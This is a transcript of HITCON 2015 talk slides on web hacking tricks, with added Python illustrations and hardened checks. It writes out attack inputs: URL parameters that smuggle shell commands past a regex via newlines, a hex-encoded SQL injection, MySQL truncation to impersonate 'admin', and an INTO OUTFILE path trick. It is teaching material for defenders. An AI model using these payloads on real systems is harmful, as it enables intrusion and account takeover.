
Those Clever Tricks in Web Hacking

Orange
August 28, 2015

HITCON 2015 Community talk slides


Transcript

  1. About Me
     • 蔡政達 a.k.a. Orange
     • Member of CHROOT / HITCON
     • Security consultant at DEVCORE
     • Speaker at conferences at home and abroad, including HITCON, AVTokyo and WooYun
     • Champion of domestic and international Capture the Flag hacking competitions
     • Has disclosed vulnerabilities in Microsoft, Django, Yahoo, Facebook, Google and others
     • Specializes in hacking techniques, web security and network penetration
     #Born-in-the-90s #CTF-grinder #Esports-player #Pentester #Web-dog
  2. Security layers: third-party content, front-end, DNS, web application, web framework, back-end language, web server, database, operating system
     XSS, XXE, SQL Injection, CSRF
  3. Security layers: third-party content, front-end, DNS, web application, web framework, back-end language, web server, database, operating system
     Struts2 OGNL RCE, Rails YAML RCE, PHP Memory UAF, XSS, UXSS, Padding Oracle, Padding Oracle, XXE, DNS Hijacking, SQL Injection, Length Extension Attack, ShellShock, HeartBleed, JSONP Hijacking, FastCGI RCE, NPRE RCE, OVERLAYFS Local Root, CSRF, Bit-Flipping Attack
  4. Security layers: third-party content, front-end, DNS, web application, web framework, back-end language, web server, database, operating system
  5. Perl
     use Data::Dumper;
     @list = ( 'Ba', 'Ba', 'Banana' );
     $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => @list };
     print Dumper($hash);   # ?
     $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => 'Ba', 'Ba' => 'Banana' };
  6. Perl
     use Data::Dumper;
     @list = ( 'Ba', 'Ba', 'Banana' );
     $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => @list };
     print Dumper($hash);   # wrong!
     $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => ('Ba', 'Ba', 'Banana') };
  7. Perl
     use Data::Dumper;
     @list = ( 'Ba', 'Ba', 'Banana' );
     $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => @list };
     print Dumper($hash);   # correct!
     # @list is flattened into the hash constructor's list, so its elements
     # become alternating keys and values
     $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => 'Ba', 'Ba' => 'Banana' };
  8. Bugzilla CVE
     my $otheruser = Bugzilla::User->create({
         login_name    => $login_name,
         realname      => $cgi->param('realname'),   # list context: returns every realname value
         cryptpassword => $password,
     });
     # index.cgi?realname=xxx&realname=login_name&realname=admin
  9. Windows
     • Windows API filename normalization behaviour
       - shell.php   # shel>.php
                     # shell"php
                     # shell.<
     • Windows tilde short filename behaviour
       - /backup/20150707_002dfa0f3ac08429.zip
       - /backup/201507~1.zip
     • Windows NTFS behaviour
       - download.php::$data
  10. NTFS and MySQL plugin_dir
     • MySQL UDF privilege escalation
       - MySQL 5.1
       - @@plugin_dir
       - Custom Dir -> System Dir -> Plugin Dir
     • Simply put: use INTO OUTFILE to create a directory
       - INTO OUTFILE 'plugins::$index_allocation'
       - mkdir plugins
  11. for ($i = 0; $i < count($args); $i++) {
         if (!preg_match('/^\w+$/', $args[$i])) {
             exit();
         }
     }
     exec("/sbin/resize $args[0] $args[1] $args[2]");
     /resize.php?arg[0]=uid.jpg&arg[1]=800&arg[2]=600
  12. for ($i = 0; $i < count($args); $i++) {
         if (!preg_match('/^\w+$/', $args[$i])) {
             exit();
         }
     }
     exec("/sbin/resize $args[0] $args[1] $args[2]");
     /resize.php?arg[0]=uid.jpg|sleep 7|&arg[1]=800;sleep 7;&arg[2]=600$(sleep 7)
     # every one of these values fails /^\w+$/
  13. for ($i = 0; $i < count($args); $i++) {
         if (!preg_match('/^\w+$/', $args[$i])) {
             exit();
         }
     }
     exec("/sbin/resize $args[0] $args[1] $args[2]");
     /resize.php?arg[0]=uid.jpg%0A&arg[1]=sleep&arg[2]=7%0A
     # '$' still matches just before a trailing newline, so %0A passes the check
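An added Python illustration of the trailing-newline anchor pitfall from slides 11 to 13 (not code from the deck): Python's re treats '$' exactly like PCRE here, so the slide's '^\w+$' check is modelled next to a fullmatch-based strict check, with the argument values constructed from the slides' URLs.

```python
import re

# The slide's pattern: in PCRE and in Python's re alike, '$' matches at the
# very end OR just before a trailing newline, so "7\n" satisfies ^\w+$.
WEAK = re.compile(r'^\w+$')
# Hardened pattern: fullmatch() has no trailing-newline exception
# (in PCRE, use \z instead of $, or the D modifier).
STRICT = re.compile(r'\w+')


def weak_check(args):
    """Mirrors the slide's loop: every argument must match /^\\w+$/."""
    return all(WEAK.match(a) is not None for a in args)


def strict_check(args):
    """Same intent, but a newline anywhere in the value is rejected."""
    return all(STRICT.fullmatch(a) is not None for a in args)


def build_command_line(args):
    """The string the slide hands to exec(), i.e. what the shell parses."""
    return "/sbin/resize " + " ".join(args)


def shell_commands(cmdline):
    """A newline ends a shell command just like ';' does; list the pieces."""
    return [c.strip() for c in cmdline.split("\n") if c.strip()]


def safe_argv(args):
    """Hardened call: validate strictly and pass an argv list, never a shell
    string, so no metacharacter can split the command."""
    if not strict_check(args):
        raise ValueError("argument failed strict validation")
    return ["/sbin/resize", *args]


# Constructed inputs, decoded from the slides' URLs (%0A is a newline).
# \w does not match '.', so the file name is kept dot-free here.
NORMAL = ["uidjpg", "800", "600"]
SLIDE12 = ["uidjpg|sleep 7|", "800;sleep 7;", "600$(sleep 7)"]
SLIDE13 = ["uidjpg\n", "sleep", "7\n"]
```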
  14. # Patch from 80sec
     if ($fastcgi_script_name ~ \..*\/.*php) {
         return 403;
     }
     http://www.80sec.com/nginx-securit.html
  15. $name = $_POST['name'];
     $r = query('SELECT * FROM users WHERE name=?', $name);
     if (count($r) > 0) {
         die('duplicated name');
     } else {
         query('INSERT INTO users VALUES(?, ?)', $name, $pass);
         die('registered');
     }
     // CREATE TABLE users(id INT, name VARCHAR(255), ...)
  16. mysql> CREATE TABLE users (
         -> id INT,
         -> name VARCHAR(255),
         -> pass VARCHAR(255)
         -> );
     Query OK, 0 rows affected (0.00 sec)
     mysql> INSERT INTO users VALUES(1, 'admin', 'pass');
     Query OK, 1 row affected (0.00 sec)
     mysql> INSERT INTO users VALUES(2, 'admin ... x', 'xxd');
     Query OK, 1 row affected, 1 warning (0.00 sec)
     mysql> SELECT * FROM users WHERE name='admin';
     +------+------------------+------+
     | id   | name             | pass |
     +------+------------------+------+
     |    1 | admin            | pass |
     |    2 | admin            | xxd  |
     +------+------------------+------+
     2 rows in set (0.00 sec)
  17. $name = $_POST['name'];
     if (strlen($name) > 16) die('name too long');
     $r = query('SELECT * FROM users WHERE name=?', $name);
     if (count($r) > 0) {
         die('duplicated name');
     } else {
         query('INSERT INTO users VALUES(?, ?)', $name, $pass);
         die('registered');
     }
     // CREATE TABLE users(id INT, name VARCHAR(255), ...) DEFAULT CHARSET=utf8
  18. mysql> CREATE TABLE users (
         -> id INT,
         -> name VARCHAR(255),
         -> pass VARCHAR(255)
         -> ) DEFAULT CHARSET=utf8;
     Query OK, 0 rows affected (0.00 sec)
     mysql> INSERT INTO users VALUES(1, 'admin', 'pass');
     Query OK, 1 row affected (0.01 sec)
     mysql> INSERT INTO users VALUES(2, 'adminx', 'xxd');
     Query OK, 1 row affected, 1 warning (0.00 sec)
     mysql> SELECT * FROM users WHERE name='admin';
     +------+-------+------+
     | id   | name  | pass |
     +------+-------+------+
     |    1 | admin | pass |
     |    2 | admin | xxd  |
     +------+-------+------+
     2 rows in set (0.00 sec)
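An added Python model of the duplicate-check bypass in slides 15 to 18 (not the deck's own code); its labelled assumptions are a non-strict MySQL server that truncates over-long VARCHAR values with a warning, the 3-byte utf8 charset cutting a value at the first 4-byte character, and a PAD SPACE case-insensitive default collation, and the hardened register() refuses any name the server would silently alter.

```python
def mysql_stored_form(value, max_chars=255, charset="utf8mb4"):
    """Model of what a non-strict MySQL server keeps for a VARCHAR(max_chars).

    Assumptions: sql_mode is not strict, so an over-long value is truncated
    with a warning instead of rejected; with the legacy 3-byte 'utf8' charset
    (utf8mb3) the value is also cut at the first 4-byte character, again with
    only a warning (the "1 warning" shown on the slides).
    """
    if charset == "utf8mb3":
        for i, ch in enumerate(value):
            if ord(ch) > 0xFFFF:          # needs 4 bytes in UTF-8
                value = value[:i]
                break
    return value[:max_chars]


def mysql_equal(a, b):
    """Assumed default collation (*_general_ci): PAD SPACE, so trailing
    spaces are ignored, and case-insensitive."""
    return a.rstrip(" ").casefold() == b.rstrip(" ").casefold()


def slide17_length_check(name):
    """The strlen() guard added on slide 17 counts bytes, so a short name
    containing one 4-byte character still passes."""
    return len(name.encode("utf-8")) <= 16


def would_collide(existing, candidate, charset="utf8mb4"):
    """True if 'candidate', as the server would store it, compares equal to a
    name that already exists, i.e. the slide's duplicate check is bypassed."""
    stored = mysql_stored_form(candidate, charset=charset)
    return any(mysql_equal(stored, name) for name in existing)


def register(existing, candidate, charset="utf8mb4"):
    """Hardened registration for the slides' flow: reject anything the server
    would silently alter, then check for a collision on the stored form."""
    if mysql_stored_form(candidate, charset=charset) != candidate:
        return "rejected: value would be truncated"
    if would_collide(existing, candidate, charset):
        return "rejected: duplicated name"
    existing.append(candidate)
    return "registered"


# Constructed inputs modelled on the slides: 'admin' padded with spaces and a
# trailing 'x' (slide 16), and 'admin' + a 4-byte emoji + 'x' (slide 18).
PADDED = "admin" + " " * 300 + "x"
EMOJI = "admin\U0001F600x"
```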
  19. $uid = $_GET['uid'];
     if (is_numeric($uid))
         query("INSERT INTO blacklist VALUES($uid)");
     $uids = query("SELECT uid FROM blacklist");
     foreach ($uids as $uid) {
         show(query("SELECT log FROM logs WHERE uid=$uid"));
     }
     // CREATE TABLE blacklist(id TEXT, uid TEXT, ...)
  20. $uid = $_GET['uid'];
     if (is_numeric($uid))
         query("INSERT INTO blacklist VALUES($uid)");
     $uids = query("SELECT uid FROM blacklist");
     foreach ($uids as $uid) {
         show(query("SELECT log FROM logs WHERE uid=$uid"));
     }
     // uid=0x31206f7220313d31   # 1 or 1=1
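An added Python walk-through of slides 19 and 20 (not the deck's code): php5_is_numeric() is a labelled model of the pre-PHP 7 is_numeric() accepting hexadecimal strings, mysql_hex_literal_value() decodes what an unquoted 0x literal stores in the TEXT column, and is_strict_uid() is the hardened check to apply both before the INSERT and again when the value is read back.

```python
import re

# Constructed from slide 20.
SLIDE20_UID = "0x31206f7220313d31"

# Model (assumption) of PHP 5's is_numeric(): optionally signed decimal
# integers and floats with leading whitespace, plus hexadecimal strings such
# as "0x1A". PHP 7 removed the hexadecimal case.
_PHP5_NUMERIC = re.compile(
    r'\s*[+-]?(?:\d+\.?\d*|\.\d+)(?:[eE][+-]?\d+)?|\s*0[xX][0-9a-fA-F]+')


def php5_is_numeric(s):
    return _PHP5_NUMERIC.fullmatch(s) is not None


def is_strict_uid(s):
    """Hardened check for both the write and the read path: plain decimal
    digits only, to be bound afterwards as an integer parameter."""
    return re.fullmatch(r'[0-9]{1,18}', s) is not None


def mysql_hex_literal_value(token):
    """An unquoted 0x... token in SQL is a hexadecimal string literal; once
    INSERTed into a TEXT column, the decoded bytes are what gets stored.
    Anything that is not a hex literal is returned unchanged."""
    m = re.fullmatch(r'0[xX]([0-9a-fA-F]+)', token)
    if m is None:
        return token
    digits = m.group(1)
    if len(digits) % 2:                   # assumption: pad odd-length literals
        digits = "0" + digits
    return bytes.fromhex(digits).decode("utf-8", errors="replace")


def second_order_query(stored_uid):
    """The query slide 19's foreach builds from the value read back out of
    blacklist: the stored string is interpolated, not re-validated."""
    return f"SELECT log FROM logs WHERE uid={stored_uid}"


def blacklist_pipeline(user_uid, validate):
    """Slide 19's flow with a pluggable validator: returns the second-stage
    query that would run, or None if the value was refused up front."""
    if not validate(user_uid):
        return None
    stored = mysql_hex_literal_value(user_uid)   # what the INSERT keeps
    return second_order_query(stored)
```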
  21. • workers.properties
       - worker.ajp1.port=8009
       - worker.ajp1.host=127.0.0.1
       - worker.ajp1.type=ajp13
     • uriworkermap.properties
       - /sub/*=ajp1
       - /sub=ajp1
  22. • HITCON 2014 CTF
       - solved by 2 of 1020 teams
     • Vulnerability in an old ColdFusion version
       - ColdFusion with the Apache Connector
       - double encoding in old ColdFusion versions leads to an information disclosure vulnerability